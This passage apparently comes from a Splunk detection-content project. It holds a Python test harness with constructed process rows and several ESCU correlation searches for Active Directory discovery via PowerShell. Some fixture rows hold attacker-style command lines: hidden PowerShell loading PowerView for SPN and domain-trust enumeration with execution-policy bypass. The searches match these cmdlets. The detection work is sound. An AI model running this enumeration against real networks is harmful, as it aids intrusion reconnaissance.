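# Constructed CIM Endpoint.Processes rows (field names after drop_dm_object_name).
SAMPLE_PROCESSES = [
    {"_time": "2024-04-17T09:58:00Z", "dest": "ws01.corp.local", "user": "CORP\\alice",
     "process_name": "powershell.exe", "parent_process_name": "explorer.exe",
     "process_id": 4120, "parent_process_id": 3008,
     "process": "powershell.exe -nop -w hidden -c \"Import-Module C:\\Users\\alice\\pv.ps1; Get-DomainUser -SPN\""},
    {"_time": "2024-04-17T09:59:10Z", "dest": "ws01.corp.local", "user": "CORP\\alice",
     "process_name": "cmd.exe", "parent_process_name": "powershell.exe",
     "process_id": 4188, "parent_process_id": 4120,
     "process": "cmd.exe /c powershell -ep bypass -c Get-DomainTrust"},
    # Wrong host process: the cmdlet name is in the command line but the
    # process_name filter excludes it, just as in the SPL.
    {"_time": "2024-04-17T10:00:00Z", "dest": "srv02.corp.local", "user": "CORP\\svc_backup",
     "process_name": "notepad.exe", "parent_process_name": "explorer.exe",
     "process_id": 900, "parent_process_id": 812,
     "process": "notepad.exe C:\\notes\\Get-DomainPolicy.txt"},
    {"_time": "2024-04-17T10:02:00Z", "dest": "dc01.corp.local", "user": "CORP\\admin",
     "process_name": "pwsh.exe", "parent_process_name": "WindowsTerminal.exe",
     "process_id": 5500, "parent_process_id": 5400,
     "process": "pwsh.exe -c Get-ForestTrust"},
    {"_time": "2024-04-17T10:05:00Z", "dest": "ws01.corp.local", "user": "CORP\\alice",
     "process_name": "powershell.exe", "parent_process_name": "explorer.exe",
     "process_id": 4300, "parent_process_id": 3008,
     "process": "powershell.exe Get-Date"},
    # A script *named* after the cmdlet also satisfies "*Get-DomainPolicy*";
    # this is the kind of known-good host the filter macro is meant to exclude.
    {"_time": "2024-04-17T10:06:00Z", "dest": "jump01.corp.local", "user": "CORP\\admin",
     "process_name": "powershell.exe", "parent_process_name": "explorer.exe",
     "process_id": 7100, "parent_process_id": 7000,
     "process": "powershell.exe -File C:\\Audit\\Get-DomainPolicy-report.ps1"},
]

def matches(ev, cmdlet):
    """where (process_name=powershell* OR process_name=cmd.exe) AND process="*<cmdlet>*" """
    return (ev["process_name"].lower() in HOST_PROCESSES
            and cmdlet.lower() in ev["process"].lower())

def detect(events, rules=RULES, dest_allowlist=frozenset()):
    """One finding per matching event and rule, carrying the risk_message shape
    the stanzas use. dest_allowlist emulates the trailing *_filter macro
    (assumed here to be the tuning hook for known-good hosts)."""
    findings = []
    for ev in events:
        if ev["dest"] in dest_allowlist:
            continue
        for cmdlet, rule in rules.items():
            if not matches(ev, cmdlet):
                continue
            findings.append({
                "rule": f"{cmdlet} with PowerShell", "dest": ev["dest"], "user": ev["user"],
                "parent_process_name": ev["parent_process_name"], "cmdlet": cmdlet,
                "mitre_attack": rule["mitre_attack"], "risk_score": rule["risk_score"],
                "_time": _ts(ev["_time"]),
                "risk_message": (f"an instance of process {ev['process_name']} with "
                                 f"commandline {ev['process']} in {ev['dest']}"),
            })
    return findings

def risk_rollup(findings):
    """Sum risk_score per risk object, the way the user and dest risk objects in
    action.risk.param._risk accumulate. Returns {(type, object): total}."""
    totals = defaultdict(int)
    for f in findings:
        totals[("user", f["user"])] += f["risk_score"]
        totals[("system", f["dest"])] += f["risk_score"]
    return dict(totals)

if __name__ == "__main__":
    found = detect(SAMPLE_PROCESSES, dest_allowlist={"jump01.corp.local"})
    for f in found:
        print(f'{f["_time"].isoformat()} {f["rule"]} [{f["mitre_attack"]}] {f["risk_message"]}')
    for (kind, obj), score in sorted(risk_rollup(found).items()):
        print(f"risk {kind}={obj}: {score}")
```

With the allowlist applied the run yields three findings and a risk total of 37 for both `CORP\alice` and `ws01.corp.local` (25 for Get-DomainUser plus 12 for Get-DomainTrust), which is the aggregation a Risk-Based Alerting rule would later threshold on; without the allowlist a fourth finding fires on the audit script on jump01, which is the false-positive class the stanzas' `known_false_positives` fields describe.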
Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies Get-ForestTrust from PowerSploit in order to gather domain trust information. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives may be present. Tune as needed. action.escu.creation_date = 2022-02-24 action.escu.modification_date = 2022-02-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Get-ForestTrust with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Suspicious PowerShell Get-ForestTrust was identified on endpoint $dest$ by user $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 12}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 12}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get-ForestTrust with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 40, "impact": 30, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1482", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies Get-ForestTrust from PowerSploit in order to gather domain trust information. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. 
action.notable.param.rule_title = Get-ForestTrust with PowerShell Script Block
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*get-foresttrust*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_foresttrust_with_powershell_script_block_filter`

[ESCU - Get WMIObject Group Discovery - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following hunting analytic identifies the use of `Get-WMIObject Win32_Group` being used with PowerShell to identify local groups on the endpoint. \
Typically, by itself, this is not malicious but may raise suspicion based on time of day, endpoint and username. \
During triage, review parallel processes and identify any further suspicious behavior.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following hunting analytic identifies the use of `Get-WMIObject Win32_Group` being used with PowerShell to identify local groups on the endpoint. \
Typically, by itself, this is not malicious but may raise suspicion based on time of day, endpoint and username. \
During triage, review parallel processes and identify any further suspicious behavior.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present. Tune as needed.
action.escu.creation_date = 2021-09-14
action.escu.modification_date = 2021-09-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Get WMIObject Group Discovery - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Get WMIObject Group Discovery - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=powershell.exe OR Processes.process_name=cmd.exe) (Processes.process="*Get-WMIObject*" AND Processes.process="*Win32_Group*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_wmiobject_group_discovery_filter`

[ESCU - Get WMIObject Group Discovery with Script Block Logging - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies the usage of `Get-WMIObject Win32_Group`, which is typically used as a way to identify groups on the endpoint. Typically, by itself, this is not malicious but may raise suspicion based on time of day, endpoint and username. \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies the usage of `Get-WMIObject Win32_Group`, which is typically used as a way to identify groups on the endpoint. Typically, by itself, this is not malicious but may raise suspicion based on time of day, endpoint and username. \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = False positives may be present. Tune as needed.
action.escu.creation_date = 2022-03-22
action.escu.modification_date = 2022-03-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - Get WMIObject Group Discovery with Script Block Logging - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Get WMIObject Group Discovery with Script Block Logging - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*Get-WMIObject*" AND ScriptBlockText = "*Win32_Group*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_wmiobject_group_discovery_with_script_block_logging_filter`

[ESCU - GetAdComputer with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. The `Get-AdComputer` commandlet returns a list of all domain computers. Red Teams and adversaries alike may use this commandlet to identify remote systems for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. The `Get-AdComputer` commandlet returns a list of all domain computers. Red Teams and adversaries alike may use this commandlet to identify remote systems for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-09-07
action.escu.modification_date = 2021-09-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetAdComputer with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetAdComputer with PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-AdComputer*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getadcomputer_with_powershell_filter`

[ESCU - GetAdComputer with PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-AdComputer` commandlet. The `Get-AdComputer` commandlet is used to return a list of all domain computers. Red Teams and adversaries may leverage this commandlet to enumerate domain computers for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-AdComputer` commandlet. The `Get-AdComputer` commandlet is used to return a list of all domain computers. Red Teams and adversaries may leverage this commandlet to enumerate domain computers for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting.
action.escu.creation_date = 2022-05-02
action.escu.modification_date = 2022-05-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetAdComputer with PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery", "CISA AA22-320A"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetAdComputer with PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA22-320A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-AdComputer*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `getadcomputer_with_powershell_script_block_filter`

[ESCU - GetAdGroup with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. The `Get-AdGroup` commandlet is used to return a list of all groups available in a Windows Domain. Red Teams and adversaries alike may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain groups. The `Get-AdGroup` commandlet is used to return a list of all groups available in a Windows Domain. Red Teams and adversaries alike may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-08-25
action.escu.modification_date = 2021-08-25
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetAdGroup with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetAdGroup with PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-AdGroup*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getadgroup_with_powershell_filter`

[ESCU - GetAdGroup with PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-AdGroup` commandlet. The `Get-AdGroup` commandlet is used to return a list of all domain groups. Red Teams and adversaries may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-AdGroup` commandlet. The `Get-AdGroup` commandlet is used to return a list of all domain groups. Red Teams and adversaries may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting.
action.escu.creation_date = 2022-03-22
action.escu.modification_date = 2022-03-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetAdGroup with PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetAdGroup with PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*Get-ADGroup*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getadgroup_with_powershell_script_block_filter`

[ESCU - GetCurrent User with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with command-line arguments that execute the `GetCurrent` method of the WindowsIdentity .NET class. This method returns an object that represents the current Windows user. Red Teams and adversaries may leverage this method to identify the logged user on a compromised endpoint for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments that execute the `GetCurrent` method of the WindowsIdentity .NET class. This method returns an object that represents the current Windows user. Red Teams and adversaries may leverage this method to identify the logged user on a compromised endpoint for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-09-13
action.escu.modification_date = 2021-09-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetCurrent User with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetCurrent User with PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*System.Security.Principal.WindowsIdentity* OR Processes.process=*GetCurrent()*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getcurrent_user_with_powershell_filter`

[ESCU - GetCurrent User with PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `GetCurrent` method of the WindowsIdentity .NET class. This method returns an object that represents the current Windows user. Red Teams and adversaries may leverage this method to identify the logged user on a compromised endpoint for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `GetCurrent` method of the WindowsIdentity .NET class. This method returns an object that represents the current Windows user. Red Teams and adversaries may leverage this method to identify the logged user on a compromised endpoint for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting.
action.escu.creation_date = 2022-03-22
action.escu.modification_date = 2022-03-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetCurrent User with PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GetCurrent User with PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*[System.Security.Principal.WindowsIdentity]*" ScriptBlockText = "*GetCurrent()*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getcurrent_user_with_powershell_script_block_filter`

[ESCU - GetDomainComputer with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. `Get-DomainComputer` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to discover remote systems. `Get-DomainComputer` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain groups for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use PowerView for troubleshooting.
action.escu.creation_date = 2021-09-07
action.escu.modification_date = 2021-09-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - GetDomainComputer with PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = Remote system discovery enumeration on $dest$ by $user$
